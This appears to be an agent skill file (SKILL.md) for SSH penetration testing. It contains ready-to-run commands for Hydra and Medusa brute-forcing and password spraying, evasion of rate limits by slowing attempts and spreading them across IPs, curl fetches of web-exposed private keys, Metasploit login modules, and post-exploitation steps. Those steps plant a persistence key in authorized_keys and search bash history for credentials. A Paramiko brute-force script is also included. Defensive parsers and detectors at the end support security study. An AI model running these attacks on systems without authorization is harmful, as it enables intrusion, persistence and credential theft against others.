---
name: ssh-penetration-testing
description: "Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security."
risk: offensive
source: community
author: zebbern
date_added: "2026-02-27"
---

Imported from https://github.com/sickn33/antigravity-awesome-skills (SKILL.md).

> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.

# SSH Penetration Testing

## Purpose

Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.

## Prerequisites

### Required Tools
- Nmap with SSH scripts
- Hydra or Medusa for brute-forcing
- ssh-audit for configuration analysis
- Metasploit Framework
- Python with Paramiko library

### Required Knowledge
- SSH protocol fundamentals
- Public/private key authentication
- Port forwarding concepts
- Linux command-line proficiency

## Outputs and Deliverables

1. **SSH Enumeration Report** - Versions, algorithms, configurations
2. **Credential Assessment** - Weak passwords, default credentials
3. **Vulnerability Assessment** - Known CVEs, misconfigurations
4. **Tunnel Documentation** - Port forwarding configurations

## Core Workflow

### Phase 1: SSH Service Discovery

Identify SSH services on target networks:

```bash
# Quick SSH port scan
nmap -p 22 192.168.1.0/24 --open

# Common alternate SSH ports
nmap -p 22,2222,22222,2200 192.168.1.100

# Full port scan for SSH (-sV so grep matches the detected service, not just the port-table name)
nmap -p- -sV --open 192.168.1.100 | grep -i ssh

# Service version detection
nmap -sV -p 22 192.168.1.100
```

### Phase 2: SSH Enumeration

Gather detailed information about SSH services:

```bash
# Banner grabbing (the server sends its identification string first; no input needed)
nc 192.168.1.100 22
# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5

# Telnet banner grab
telnet 192.168.1.100 22

# Nmap version detection with scripts
nmap -sV -p 22 --script ssh-hostkey 192.168.1.100

# Enumerate supported algorithms
nmap -p 22 --script ssh2-enum-algos 192.168.1.100

# Get host keys
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100

# Check authentication methods
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100
```

The identification string gives the exact software version (`OpenSSH_8.4p1`) plus a vendor comment (`Debian-5`). Distributions backport fixes without changing the upstream version, so check the package version against vendor advisories before assuming a CVE applies. A host key fingerprint that repeats across hosts indicates cloned images, which is a finding in itself.

### Phase 3: SSH Configuration Auditing

Identify weak configurations:

```bash
# ssh-audit - comprehensive SSH audit
ssh-audit 192.168.1.100

# ssh-audit with specific port
ssh-audit -p 2222 192.168.1.100

# Output includes:
# - Algorithm recommendations
# - Security vulnerabilities
# - Hardening suggestions
```

Key configuration weaknesses to identify:
- Weak key exchange algorithms (diffie-hellman-group1-sha1)
- Weak ciphers (arcfour, 3des-cbc)
- Weak MACs (hmac-md5, hmac-sha1-96)
- Deprecated protocol versions (SSH-1; a banner of `SSH-1.99` means the server still accepts it)

### Phase 4: Credential Attacks

Check the `ssh-auth-methods` output first: if the server offers only `publickey`, password attacks cannot succeed and only generate noise and bans.

#### Brute-Force with Hydra

```bash
# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Username list, single password
hydra -L users.txt -p Password123 ssh://192.168.1.100

# Username and password lists
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# With specific port
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

# Rate limiting evasion (slow): one task, 5 seconds between connects
# (-w is the response timeout; -W is the delay between connects per task)
hydra -l admin -P passwords.txt -t 1 -W 5 ssh://192.168.1.100

# Verbose output
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100

# Exit on first success
hydra -l admin -P passwords.txt -f ssh://192.168.1.100
```

Keep parallelism low against SSH: sshd's `MaxStartups` caps unauthenticated connections and drops the rest, which Hydra reports as errors rather than failed logins. Hydra itself warns and recommends `-t 4` for SSH.

#### Brute-Force with Medusa

```bash
# Basic brute-force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# Multiple targets
medusa -H targets.txt -u admin -P passwords.txt -M ssh

# With username list
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

# Specific port
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222
```

#### Password Spraying

Spraying tries one password across many accounts, so it stays under per-account lockout thresholds; per-IP counting (fail2ban and similar) still sees every attempt.

```bash
# Test common password across users
hydra -L users.txt -p Summer2024! ssh://192.168.1.100

# Multiple common passwords
for pass in "Password123" "Welcome1" "Summer2024!"; do
    hydra -L users.txt -p "$pass" ssh://192.168.1.100
done
```

### Phase 5: Key-Based Authentication Testing

Test for weak or exposed keys. The client refuses a private key that is group- or world-readable, so `chmod 600` a recovered key before use:

```bash
# Attempt login with found private key
chmod 600 id_rsa
ssh -i id_rsa user@192.168.1.100

# Specify key explicitly (bypass agent)
ssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100

# Force password authentication
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@192.168.1.100

# Try common key names (BatchMode=yes so a rejected key does not fall back to a password prompt)
for key in id_rsa id_dsa id_ecdsa id_ed25519; do
    ssh -o IdentitiesOnly=yes -o BatchMode=yes -i "$key" user@192.168.1.100
done
```

Check for exposed keys:

```bash
# Common locations for private keys
~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
/etc/ssh/ssh_host_*_key
/root/.ssh/
/home/*/.ssh/

# Web-accessible keys (check with curl/wget)
curl -s http://target.com/.ssh/id_rsa
curl -s http://target.com/id_rsa
curl -s http://target.com/backup/ssh_keys.tar.gz
```

### Phase 6: Vulnerability Exploitation

Search for known vulnerabilities:

```bash
# Search for exploits
searchsploit openssh
searchsploit openssh 7.2

# Common SSH vulnerabilities
# CVE-2018-15473 - Username enumeration (server side, OpenSSH <= 7.7)
# CVE-2016-0777 - Roaming information leak (client side, OpenSSH 5.4 to 7.1)
# CVE-2016-0778 - Roaming buffer overflow (client side, OpenSSH 5.4 to 7.1)

# Metasploit enumeration
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.100
run

# Username enumeration (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/wordlists/users.txt
run
```

Note that the two 2016 roaming bugs affect the OpenSSH *client*: they matter when a target host connects out to a server you control, not for the listening service you are scanning.

### Phase 7: SSH Tunneling and Port Forwarding

#### Local Port Forwarding

Forward local port to remote service:

```bash
# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server

# Access internal web server through SSH
ssh -L 8080:192.168.1.50:80 user@192.168.1.100
# Now access http://localhost:8080

# Access internal database
ssh -L 3306:192.168.1.50:3306 user@192.168.1.100

# Multiple forwards
ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 user@192.168.1.100
```

#### Remote Port Forwarding

Expose local service to remote network:

```bash
# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server

# Expose local web server to remote
ssh -R 8080:localhost:80 user@192.168.1.100
# Remote can access via localhost:8080
# (the listener binds to the remote loopback only, unless sshd has GatewayPorts yes)

# Reverse shell callback
ssh -R 4444:localhost:4444 user@192.168.1.100
```

#### Dynamic Port Forwarding (SOCKS Proxy)

Create SOCKS proxy for network pivoting:

```bash
# Create SOCKS proxy on local port 1080
ssh -D 1080 user@192.168.1.100

# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
# -sT -Pn: a SOCKS proxy only carries TCP connections, so SYN scans and ICMP pings cannot pass
proxychains nmap -sT -Pn 192.168.1.0/24

# Browser configuration
# Set SOCKS proxy to localhost:1080
```

#### ProxyJump (Jump Hosts)

Chain through multiple SSH servers:

```bash
# Jump through intermediate host
ssh -J user1@jump_host user2@target_host

# Multiple jumps
ssh -J user1@jump1,user2@jump2 user3@target

# With SSH config
# ~/.ssh/config
Host target
    HostName 192.168.2.50
    User admin
    ProxyJump user@192.168.1.100
```

### Phase 8: Post-Exploitation

Activities after gaining SSH access:

```bash
# Check sudo privileges
sudo -l

# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# Check SSH directory
ls -la ~/.ssh/
cat ~/.ssh/known_hosts
cat ~/.ssh/authorized_keys

# Add persistence (add your key)
# sshd (StrictModes, the default) ignores the file if ~/.ssh or authorized_keys is group/world-writable
mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Extract SSH configuration
cat /etc/ssh/sshd_config

# Find other users
grep -Ev 'nologin|false' /etc/passwd
ls /home/

# History for credentials
grep -i ssh ~/.bash_history
grep -i pass ~/.bash_history
```

### Phase 9: Custom SSH Scripts with Paramiko

Python-based SSH automation:

```python
#!/usr/bin/env python3
import sys

import paramiko


def ssh_connect(host, username, password, port=22):
    """Attempt an SSH password login; return a connected client or None."""
    client = paramiko.SSHClient()
    # Accept unknown host keys: acceptable for an assessment, never for production code
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        # allow_agent/look_for_keys=False so only the supplied password is tested;
        # otherwise Paramiko tries the agent and ~/.ssh keys first and burns attempts
        client.connect(host, port=port, username=username, password=password,
                       timeout=5, banner_timeout=10,
                       allow_agent=False, look_for_keys=False)
        print(f"[+] Success: {username}:{password}")
        return client
    except paramiko.AuthenticationException:
        print(f"[-] Failed: {username}:{password}")
        return None
    except Exception as e:
        # Connection refused, timeouts, or resets from fail2ban/MaxStartups
        print(f"[!] Error: {e}")
        return None


def execute_command(client, command):
    """Execute a command via SSH and return (stdout, stderr)."""
    stdin, stdout, stderr = client.exec_command(command)
    output = stdout.read().decode()
    errors = stderr.read().decode()
    return output, errors


def ssh_brute_force(host, username, wordlist):
    """Try each password in the wordlist; stop at the first success."""
    # errors="ignore": large wordlists such as rockyou.txt contain non-UTF-8 bytes
    with open(wordlist, "r", errors="ignore") as f:
        passwords = f.read().splitlines()

    for password in passwords:
        client = ssh_connect(host, username, password.strip())
        if client:
            # Run post-exploitation commands
            output, _ = execute_command(client, "id; uname -a")
            print(output)
            client.close()
            return True
    return False


# Usage: ./ssh_test.py [target] [user]
if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100"
    user = sys.argv[2] if len(sys.argv) > 2 else "admin"

    # Single credential test
    client = ssh_connect(target, user, "password123")
    if client:
        output, _ = execute_command(client, "ls -la")
        print(output)
        client.close()
```

### Phase 10: Metasploit SSH Modules

Use Metasploit for comprehensive SSH testing:

```bash
# Start Metasploit
msfconsole

# SSH Version Scanner
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
run

# SSH Login Brute-Force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME admin
set PASS_FILE /usr/share/wordlists/rockyou.txt
set VERBOSE true
run

# SSH Key Login
use auxiliary/scanner/ssh/ssh_login_pubkey
set RHOSTS 192.168.1.100
set USERNAME admin
set KEY_PATH /path/to/id_rsa    # a file or a directory of keys; older versions name this option KEY_FILE
run

# Username Enumeration
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE users.txt
run

# Post-exploitation with SSH session
sessions -i 1
```

## Quick Reference

### SSH Enumeration Commands

| Command | Purpose |
|---------|---------|
| `nc <host> 22` | Banner grabbing |
| `ssh-audit <host>` | Configuration audit |
| `nmap --script "ssh*"` | SSH NSE scripts (quote the glob so the shell does not expand it) |
| `searchsploit openssh` | Find exploits |

### Brute-Force Options

| Tool | Command |
|------|---------|
| Hydra | `hydra -l user -P pass.txt ssh://host` |
| Medusa | `medusa -h host -u user -P pass.txt -M ssh` |
| Ncrack | `ncrack -p 22 --user admin -P pass.txt host` |
| Metasploit | `use auxiliary/scanner/ssh/ssh_login` |

### Port Forwarding Types

| Type | Command | Use Case |
|------|---------|----------|
| Local | `-L 8080:target:80` | Access remote services locally |
| Remote | `-R 8080:localhost:80` | Expose local services remotely |
| Dynamic | `-D 1080` | SOCKS proxy for pivoting |

### Common SSH Ports

| Port | Description |
|------|-------------|
| 22 | Default SSH |
| 2222 | Common alternate |
| 22222 | Another alternate |
| 830 | NETCONF over SSH |

## Constraints and Limitations

### Legal Considerations
- Always obtain written authorization
- Brute-forcing may violate ToS
- Document all testing activities

### Technical Limitations
- Rate limiting may block attacks
- Fail2ban or similar may ban IPs
- Key-based auth prevents password attacks
- Two-factor authentication adds complexity

### Evasion Techniques
- Use slow brute-force: `-t 1 -W 5`
- Distribute attacks across IPs
- Use timing-based enumeration carefully
- Respect lockout thresholds

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| Connection Refused | Verify SSH running; check firewall; confirm port; test from different IP |
| Authentication Failures | Verify username; check password policy; key permissions (600); authorized_keys format |
| Tunnel Not Working | Check GatewayPorts/AllowTcpForwarding in sshd_config; verify firewall; use `ssh -v` |

## When to Use
This skill applies whenever the workflow or actions described in the overview need to be carried out.
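The enumeration in Phase 2 and the algorithm audit in Phase 3 rest on two messages the server sends before any authentication: the identification string and its `SSH_MSG_KEXINIT`. The following script, an added example that is not part of the original skill, parses both (RFC 4253 sections 4.2 and 7.1), flags the weak algorithms the skill lists, and shows the negotiation rule that decides whether a weak algorithm the server merely offers is ever used. The banner and the KEXINIT bytes are constructed in the script, not captured from a real host; the weak-algorithm sets are this example's own choice.

```python
#!/usr/bin/env python3
"""Parse an SSH identification string and a KEXINIT payload, then flag weak
algorithms. Added example; sample banner and KEXINIT bytes are constructed."""
import re
import struct

# Weak algorithm sets (names as reported by ssh-audit / ssh2-enum-algos).
WEAK_KEX = {"diffie-hellman-group1-sha1", "diffie-hellman-group-exchange-sha1",
            "diffie-hellman-group14-sha1"}
WEAK_CIPHERS = {"arcfour", "arcfour128", "arcfour256", "3des-cbc", "blowfish-cbc"}
WEAK_MACS = {"hmac-md5", "hmac-md5-96", "hmac-sha1-96"}
SSH_MSG_KEXINIT = 20
# The ten name-lists of KEXINIT, in wire order (RFC 4253 section 7.1).
KEXINIT_FIELDS = ("kex", "hostkey", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
                  "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")
# SSH-protoversion-softwareversion SP comments CR LF (RFC 4253 section 4.2)
BANNER_RE = re.compile(rb"^SSH-(?P<proto>\d\.\d+)-(?P<software>\S+)(?: (?P<comments>.*?))?\r?\n?$")


def parse_banner(line: bytes) -> dict:
    """Split 'SSH-2.0-OpenSSH_8.4p1 Debian-5' into protocol, software and comment.
    Protocol '1.99' means the server also accepts SSH-1."""
    m = BANNER_RE.match(line)
    if not m:
        raise ValueError("not an SSH identification string")
    return {
        "proto": m["proto"].decode(),
        "software": m["software"].decode(),
        "comments": (m["comments"] or b"").decode(),
        "accepts_ssh1": m["proto"] in (b"1.99", b"1.5"),
    }


def _read_namelist(buf: bytes, off: int):
    """uint32 length followed by a comma-separated ASCII list."""
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    names = buf[off:off + n].decode("ascii")
    return [a for a in names.split(",") if a], off + n


def parse_kexinit(payload: bytes) -> dict:
    """Decode: msg byte, 16-byte cookie, ten name-lists, boolean, uint32 reserved."""
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not a KEXINIT payload")
    off = 1 + 16  # skip message type and cookie
    out = {}
    for field in KEXINIT_FIELDS:
        out[field], off = _read_namelist(payload, off)
    out["first_kex_packet_follows"] = bool(payload[off])
    return out


def build_kexinit(lists: dict, cookie: bytes = bytes(16)) -> bytes:
    """Encode a KEXINIT payload from name-lists (used here to construct the sample)."""
    body = bytes([SSH_MSG_KEXINIT]) + cookie
    for field in KEXINIT_FIELDS:
        names = ",".join(lists.get(field, [])).encode("ascii")
        body += struct.pack(">I", len(names)) + names
    return body + b"\x00" + struct.pack(">I", 0)


def audit_kexinit(kex: dict) -> list:
    """Return (field, algorithm) pairs for every weak algorithm the peer offers."""
    findings = []
    for field, weak in (("kex", WEAK_KEX), ("enc_c2s", WEAK_CIPHERS), ("enc_s2c", WEAK_CIPHERS),
                        ("mac_c2s", WEAK_MACS), ("mac_s2c", WEAK_MACS)):
        findings += [(field, a) for a in kex[field] if a in weak]
    return findings


def negotiate(client: list, server: list):
    """RFC 4253 section 7.1: the first client-preferred algorithm that the server
    also lists wins, so a weak algorithm the server offers is only used when a
    client asks for it (or is downgraded to asking for it)."""
    return next((a for a in client if a in server), None)


# Constructed sample: a modern server that still offers legacy algorithms.
SAMPLE_BANNER = b"SSH-2.0-OpenSSH_8.4p1 Debian-5\r\n"
SAMPLE_KEXINIT = build_kexinit({
    "kex": ["curve25519-sha256", "diffie-hellman-group1-sha1"],
    "hostkey": ["ssh-ed25519", "rsa-sha2-512"],
    "enc_c2s": ["aes256-gcm@openssh.com", "3des-cbc"],
    "enc_s2c": ["aes256-gcm@openssh.com", "3des-cbc"],
    "mac_c2s": ["hmac-sha2-256", "hmac-md5"],
    "mac_s2c": ["hmac-sha2-256", "hmac-md5"],
    "comp_c2s": ["none"], "comp_s2c": ["none"],
})

if __name__ == "__main__":
    print(parse_banner(SAMPLE_BANNER))
    kex = parse_kexinit(SAMPLE_KEXINIT)
    for field, alg in audit_kexinit(kex):
        print(f"[!] weak {field}: {alg}")
    # A legacy-only client is served the weak exchange; a modern client is not.
    print(negotiate(["diffie-hellman-group1-sha1"], kex["kex"]))
    print(negotiate(["curve25519-sha256", "diffie-hellman-group1-sha1"], kex["kex"]))
```

To use this against a live host, read the banner line and then the first binary packet after sending your own identification string; the payload parser above takes the packet payload with the length, padding and MAC fields already stripped.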
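Phase 4 and the Constraints section both note that fail2ban-style per-IP counting is what stops brute-forcing and spraying. This added example, not part of the original skill, is the detection side of that: it parses sshd `auth.log` lines, counts failures per source address, and tells a brute-force (many attempts against few accounts) from a password spray (few attempts against many accounts), escalating any success that follows failures. The log lines are constructed, and the thresholds are illustrative assumptions, not fail2ban's defaults.

```python
#!/usr/bin/env python3
"""Classify sshd auth.log lines into brute-force vs. password-spray per source IP.
Added example; the sample log and the thresholds are constructed for illustration."""
import re
from collections import defaultdict

# Matches the success/failure lines OpenSSH writes via syslog.
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"(?P<method>password|publickey|keyboard-interactive/pam|none) "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)
FAIL_THRESHOLD = 5       # failures from one IP before it is reported at all (assumption)
SPRAY_MIN_USERS = 4      # at least this many distinct users...
SPRAY_MAX_PER_USER = 2   # ...each tried at most this often, looks like a spray


def parse_events(lines):
    """Yield one dict per authentication success/failure line; ignore the rest."""
    for line in lines:
        m = AUTH_RE.search(line)
        if m:
            yield m.groupdict()


def classify(lines):
    """Per source IP: verdict 'brute-force', 'password-spray' or None, the counts
    behind it, and the accounts that logged in after earlier failures."""
    per_ip = defaultdict(lambda: {"fails": defaultdict(int), "success_after_fail": []})
    for ev in parse_events(lines):
        entry = per_ip[ev["ip"]]
        if ev["result"] == "Failed":
            entry["fails"][ev["user"]] += 1
        elif sum(entry["fails"].values()) > 0:
            # An 'Accepted' after failures from the same IP is the line to escalate.
            entry["success_after_fail"].append(ev["user"])
    verdicts = {}
    for ip, entry in per_ip.items():
        fails = entry["fails"]
        total = sum(fails.values())
        verdict = None
        if total >= FAIL_THRESHOLD:
            if len(fails) >= SPRAY_MIN_USERS and max(fails.values()) <= SPRAY_MAX_PER_USER:
                verdict = "password-spray"
            else:
                verdict = "brute-force"
        verdicts[ip] = {"verdict": verdict, "failures": total, "users": len(fails),
                        "compromised": sorted(set(entry["success_after_fail"]))}
    return verdicts


# Constructed sample log (syslog format as written by OpenSSH on Debian/Ubuntu):
# one brute-force that succeeds, one spray, one normal key login, one stray failure.
SAMPLE_LOG = [
    "Mar 10 12:00:01 bastion sshd[2101]: Failed password for admin from 192.0.2.10 port 51234 ssh2",
    "Mar 10 12:00:02 bastion sshd[2102]: Failed password for admin from 192.0.2.10 port 51235 ssh2",
    "Mar 10 12:00:03 bastion sshd[2103]: Failed password for admin from 192.0.2.10 port 51236 ssh2",
    "Mar 10 12:00:04 bastion sshd[2104]: Failed password for admin from 192.0.2.10 port 51237 ssh2",
    "Mar 10 12:00:05 bastion sshd[2105]: Failed password for admin from 192.0.2.10 port 51238 ssh2",
    "Mar 10 12:00:06 bastion sshd[2106]: Accepted password for admin from 192.0.2.10 port 51239 ssh2",
    "Mar 10 12:05:00 bastion sshd[2201]: Failed password for invalid user alice from 192.0.2.11 port 40001 ssh2",
    "Mar 10 12:05:01 bastion sshd[2202]: Failed password for bob from 192.0.2.11 port 40002 ssh2",
    "Mar 10 12:05:02 bastion sshd[2203]: Failed password for invalid user carol from 192.0.2.11 port 40003 ssh2",
    "Mar 10 12:05:03 bastion sshd[2204]: Failed password for dave from 192.0.2.11 port 40004 ssh2",
    "Mar 10 12:05:04 bastion sshd[2205]: Failed password for erin from 192.0.2.11 port 40005 ssh2",
    "Mar 10 12:10:00 bastion sshd[2301]: Accepted publickey for deploy from 198.51.100.7 port 52000 ssh2: ED25519 SHA256:constructed",
    "Mar 10 12:10:01 bastion sshd[2302]: Failed password for root from 203.0.113.9 port 60000 ssh2",
]

if __name__ == "__main__":
    for ip, info in classify(SAMPLE_LOG).items():
        print(f"{ip:15} {info['verdict'] or 'ok':15} fails={info['failures']} "
              f"users={info['users']} compromised={info['compromised']}")
```

Spreading a spray across source addresses (the "Distribute attacks across IPs" evasion in the Constraints section) drops every per-IP count below `FAIL_THRESHOLD`; catching that requires correlating on the target user or on time windows instead of on the source address.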
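The `-D 1080` listener from Phase 7 speaks SOCKS, and proxychains does nothing more than the handshake below before every connection, which is also why the page's `nmap -sT -Pn` flags are required. This added example, not part of the original skill, encodes and decodes both sides of a SOCKS5 CONNECT exchange (RFC 1928) in memory. The `handle_request` function is a stand-in for the proxy side written only to show the reply format; its port allowlist and the `0.0.0.0:0` bound address it reports are this example's assumptions, not OpenSSH's behaviour.

```python
#!/usr/bin/env python3
"""Both sides of a SOCKS5 CONNECT exchange, as performed against an 'ssh -D' port.
Added example; the proxy-side handler is a constructed stand-in."""
import socket
import struct

SOCKS_VER = 5
CMD_CONNECT = 1
ATYP_IPV4, ATYP_DOMAIN = 1, 3
REP_OK, REP_NOT_ALLOWED, REP_CMD_UNSUPPORTED = 0, 2, 7


def client_greeting() -> bytes:
    """VER=5, one method offered: 0x00 'no authentication', the only one ssh -D takes."""
    return bytes([SOCKS_VER, 1, 0])


def parse_method_select(reply: bytes) -> int:
    """Server picks a method; 0xFF means none of the offered ones was acceptable."""
    ver, method = reply[:2]
    if ver != SOCKS_VER or method == 0xFF:
        raise ConnectionError("no acceptable auth method")
    return method


def connect_request(host: str, port: int) -> bytes:
    """VER CMD RSV ATYP DST.ADDR DST.PORT. A hostname is sent as a domain name so
    the SSH server resolves it on the inside (proxychains' proxy_dns)."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VER, CMD_CONNECT, 0]) + addr + struct.pack(">H", port)


def parse_request(req: bytes):
    """Proxy side: decode (cmd, host, port) from a client request."""
    ver, cmd, _rsv, atyp = req[:4]
    if ver != SOCKS_VER:
        raise ValueError("bad version")
    if atyp == ATYP_IPV4:
        host, off = socket.inet_ntoa(req[4:8]), 8
    elif atyp == ATYP_DOMAIN:
        n = req[4]
        host, off = req[5:5 + n].decode("idna"), 5 + n
    else:
        raise ValueError("unsupported address type")
    (port,) = struct.unpack(">H", req[off:off + 2])
    return cmd, host, port


def reply(rep: int, bound=("0.0.0.0", 0)) -> bytes:
    """VER REP RSV ATYP BND.ADDR BND.PORT (bound address is an assumption here)."""
    return (bytes([SOCKS_VER, rep, 0, ATYP_IPV4]) + socket.inet_aton(bound[0])
            + struct.pack(">H", bound[1]))


def parse_reply(data: bytes):
    """Client side: (rep, bound_host, bound_port); rep 0 means the tunnel is up."""
    ver, rep, _rsv, atyp = data[:4]
    if ver != SOCKS_VER or atyp != ATYP_IPV4:
        raise ValueError("unexpected reply")
    return rep, socket.inet_ntoa(data[4:8]), struct.unpack(">H", data[8:10])[0]


def handle_request(req: bytes, allowed_ports=(22, 80, 443)) -> bytes:
    """Constructed proxy stand-in: only CONNECT exists (no raw sockets, hence -sT -Pn),
    and a ruleset, here a port allowlist, decides whether to relay."""
    cmd, host, port = parse_request(req)
    if cmd != CMD_CONNECT:
        return reply(REP_CMD_UNSUPPORTED)
    if port not in allowed_ports:
        return reply(REP_NOT_ALLOWED)
    return reply(REP_OK)


def exchange(host: str, port: int) -> int:
    """Run the full client <-> proxy exchange in memory; return the REP code."""
    greeting = client_greeting()
    assert greeting[2] == 0
    method = parse_method_select(bytes([SOCKS_VER, 0]))   # proxy selects no-auth
    assert method == 0
    rep, _bound_host, _bound_port = parse_reply(handle_request(connect_request(host, port)))
    return rep


if __name__ == "__main__":
    print("connect 192.168.1.50:80  ->", exchange("192.168.1.50", 80))
    print("connect intranet.local:3306 ->", exchange("intranet.local", 3306))
```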
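Phase 8 has you pull `/etc/ssh/sshd_config`, and the Troubleshooting table points at `GatewayPorts` and `AllowTcpForwarding` in it. Reading that file correctly needs the semantics from `sshd_config(5)`: keywords are case-insensitive, the first occurrence of a keyword wins, and a `Match` block applies only conditionally. This added example, not part of the original skill, audits the global section of a config against the weaknesses listed in Phase 3 and shows the weak configuration beside a hardened one. Both config texts are constructed; the OpenSSH defaults used for omitted keywords are taken from the man page, and `Include` directives are not followed (assumption: a single-file config).

```python
#!/usr/bin/env python3
"""Audit the global section of an sshd_config with first-occurrence-wins semantics.
Added example; both sample configs are constructed."""
import re

# OpenSSH defaults for keywords a config omits (sshd_config(5)).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "pubkeyauthentication": "yes",
    "x11forwarding": "no",
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "maxauthtries": "6",
}
# Acceptable values on a hardened host. AllowTcpForwarding is expected off
# except on a designated jump host, where a Match block should re-enable it.
EXPECTED = {
    "permitrootlogin": {"no", "prohibit-password"},
    "passwordauthentication": {"no"},
    "permitemptypasswords": {"no"},
    "pubkeyauthentication": {"yes"},
    "x11forwarding": {"no"},
    "allowtcpforwarding": {"no"},
    "gatewayports": {"no"},
}
WEAK_ALGOS = {"diffie-hellman-group1-sha1", "arcfour", "3des-cbc", "hmac-md5", "hmac-sha1-96"}
# 'Keyword value', 'Keyword=value' and 'Keyword = value' are all accepted by sshd.
LINE_RE = re.compile(r"^\s*([A-Za-z0-9]+)\s*[=\s]\s*(.*?)\s*$")


def effective_settings(text: str) -> dict:
    """{keyword: value} for the global section; later duplicates are ignored, as sshd does."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "match":
            break  # everything below is conditional and must be audited per Match
        settings.setdefault(key, value)
    return {**DEFAULTS, **settings}


def algorithm_findings(settings: dict) -> list:
    """Weak algorithms enabled via Ciphers/MACs/KexAlgorithms. A leading '-'
    removes names from the default set, so that form is never a finding."""
    out = []
    for key in ("ciphers", "macs", "kexalgorithms"):
        value = settings.get(key, "")
        if value.startswith("-"):
            continue
        out += [(key, alg) for alg in value.lstrip("+^").split(",") if alg in WEAK_ALGOS]
    return out


def audit(text: str) -> list:
    """(keyword, actual, expected) for every setting that fails the checks above."""
    s = effective_settings(text)
    findings = [(k, s[k], sorted(ok)) for k, ok in EXPECTED.items() if s[k].lower() not in ok]
    if int(s["maxauthtries"]) > 4:
        findings.append(("maxauthtries", s["maxauthtries"], ["<= 4"]))
    findings += [(k, alg, ["removed"]) for k, alg in algorithm_findings(s)]
    return findings


# Constructed: looks hardened at the bottom but is not. The first
# PasswordAuthentication line wins, and PermitRootLogin relies on the default.
WEAK_CONFIG = """\
Port 22
PasswordAuthentication yes
AllowTcpForwarding yes
MaxAuthTries 10
Ciphers aes256-ctr,3des-cbc
MACs hmac-sha2-256,hmac-md5
PasswordAuthentication no
"""
# Constructed: the corrected counterpart, forwarding re-enabled only for a jump user.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
PubkeyAuthentication yes
X11Forwarding no
AllowTcpForwarding no
GatewayPorts no
MaxAuthTries 3
KexAlgorithms curve25519-sha256,diffie-hellman-group16-sha512
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
Match User jumpuser
    AllowTcpForwarding yes
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name}: {len(audit(cfg))} finding(s)")
        for keyword, actual, expected in audit(cfg):
            print(f"  {keyword}: {actual!r}, expected {expected}")
```

The trailing `PasswordAuthentication no` in the weak config is the classic false fix: a hardening script appended it, `sshd -T` still reports `passwordauthentication yes`, and password attacks from Phase 4 keep working. Run `sshd -T` on the target when you have access; it prints the effective values after all parsing, which is the ground truth this script approximates.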